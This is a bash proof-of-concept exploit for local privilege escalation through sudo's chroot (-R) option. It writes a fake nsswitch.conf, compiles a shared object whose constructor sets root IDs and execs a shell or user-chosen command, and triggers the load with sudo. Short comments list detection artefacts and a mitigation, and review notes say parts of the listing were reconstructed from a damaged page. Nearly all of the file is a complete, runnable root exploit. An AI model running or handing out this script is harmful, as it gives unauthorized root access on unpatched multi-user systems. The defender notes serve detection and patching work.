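#!/usr/bin/env bash
#
# Proof-of-concept for a local privilege escalation through sudo's -R
# (chroot) option. The script builds a directory tree whose
# etc/nsswitch.conf names a "passwd" source of "/w", places a shared object
# at libnss_/w.so.2, and then runs `sudo -R xd /bin/true`. On an affected
# sudo the NSS lookup happens against the caller-supplied root while sudo
# still holds root privileges, so the shared object's constructor runs as
# root.
#
# Usage: <script> [command ...]   (default command: /bin/bash)
#
# Artefacts a defender can key on:
#   - sudo invoked with -R / --chroot pointing at a user-writable directory
#   - an nsswitch.conf created outside the system /etc
#   - a shared object compiled into a directory named "libnss_" under /tmp
#   - sudo mapping a library from a non-system path
# Mitigation: run a sudo build that includes the vendor fix for chroot-time
# NSS loading, and do not grant the chroot option in sudoers.
#
# NOTE(review): this listing was recovered from a page where the whole
# script was collapsed onto one line and the here-document operator and the
# header name after "#include" were lost; both are reconstructed below from
# the surviving "EOF" terminator and the libc calls the C code makes.

# Private staging directory; everything the script creates lives in it.
STAGE=$(mktemp -d /tmp/XXXXXX)
cd -- "${STAGE:?}" || exit 1

# Command executed by the constructor; "$*" joins the arguments into the one
# string that `sh -c` receives (the original used "$@" in an assignment,
# which joins the same way but is flagged by ShellCheck as SC2124).
if [ $# -eq 0 ]; then
  CMD="/bin/bash"
else
  CMD="$*"
fi

# Escape backslashes and double quotes so the command can sit inside a C
# string literal. Newlines in the command are not handled.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

# Unquoted delimiter on purpose: ${CMD_C_ESCAPED} must expand into the C
# source.
cat >w.c <<EOF
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

# Fake root: xd/etc/nsswitch.conf points the passwd database at "/w", which
# resolves to libnss_/w.so.2 relative to the working directory.
mkdir -p xd/etc libnss_
echo "passwd: /w" >xd/etc/nsswitch.conf
cp /etc/group xd/etc/

# NOTE(review): -Wl,-init,w names a symbol "w" that w.c does not define; the
# constructor attribute is what makes woot() run at load time. Flag kept as
# on the page.
gcc -shared -fPIC -Wl,-init,w -o libnss_/w.so.2 w.c

# Trigger: sudo resolves NSS inside the supplied root before running
# /bin/true.
sudo -R xd /bin/true

# Remove the staging directory (reached only after the spawned command
# returns).
rm -rf -- "${STAGE:?}"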